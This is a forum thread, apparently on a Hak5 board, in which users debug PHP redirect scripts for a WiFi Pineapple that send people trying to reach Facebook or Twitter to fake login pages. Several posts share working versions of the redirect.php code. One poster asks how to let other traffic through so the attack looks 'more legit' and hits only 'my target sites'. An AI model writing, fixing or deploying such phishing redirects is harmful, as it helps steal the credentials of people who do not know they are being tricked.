Jump to content

Phishing redirect script not doing its job


deviney

Recommended Posts

I am trying to use the hak5 fishing files and i have placed them in a folder on my USB and created symbolic links in the pineapples /www/.

This is the script i am using (the one in the Hak5 download).

<?php
$ref = $_SERVER['HTTP_REFERER'];


if (strpos($ref, "facebook")) header('Location: facebook.html');
if (strpos($ref, "twitter"))  header('Location: twitter.html');

require('peets.html');

?>   

the problem is when i type facebook.com the peets.html page shows insteal of the facebook.html page :( I have tried on a blackberry and windows 7 laptop (using IE and Firefox) with the same results.

I am using a Pineapple mark IV and version 2.7.

Can somebody explain were iv went wrong and a fix if possible.

Thank you

Link to comment
Share on other sites

Hi i did what you asked used the code below as my redirect.php

<?php
      $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        if (strpos($ref, "facebook")){
                header('Location: facebook.html');
        }
        require('peets.php');
?>    

I then noticed that the 'require('peets.php');' was wrong for me and edited it to 'require('peets.html');' and am about to test.

Ill be back shortly to tell you the results.

EDIT: THIS WORKED PERFECTLY!

On a side note, is it possible to check the address that the user is going to and if its not in the redirect.php instead of going to peets.html, it actualy goes to the website the user wanted???

This would just make it look a little more legit and and only attack my target sites ;)

Edited by deviney
Link to comment
Share on other sites

  • 2 weeks later...

Im having the same issue. but changing the " $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; " line in redirect.php does not do the trick.

i just updated to 2.7.5 and the stock files in phish-pineapple.zip worked fine in 2.7.0

i can kind og work around this issue like this

<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "facebook")){
require ('facebook.html'); break;
}

if (strpos($ref, "twitter")){
require ('twitter.html'); break;

}

?>

but thats not how i would like to do this because it still says redirect.php.

also before when i was running 2.7.0 the connected client still had internet access when not going to the sites setup on redirect.php now it just sends all sites to site/redirect.php so if i go to google.com it goes to google.com/redirect.php

Hope i can get this resolved

Thanks

Haroo

Link to comment
Share on other sites

im having a problem getting the phishing zip file to open up in winSCP,
so i broke down the file in my desk top, and transferred the files that
way. but if i transfer the twitter files and the facebook filse, it
tells me that there isn't enough room to transfer all the files on the
pineapple, so i have to abort the operation. i then just transfer
facebook file, which went fine. but on the test computer, it just states
that it can't connect to the server! it is showing "/redirect.php" in the address, but it won't do anything i'm banging my head against the wall here. please help this beginner. wrussprince@yahoo.com tks

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...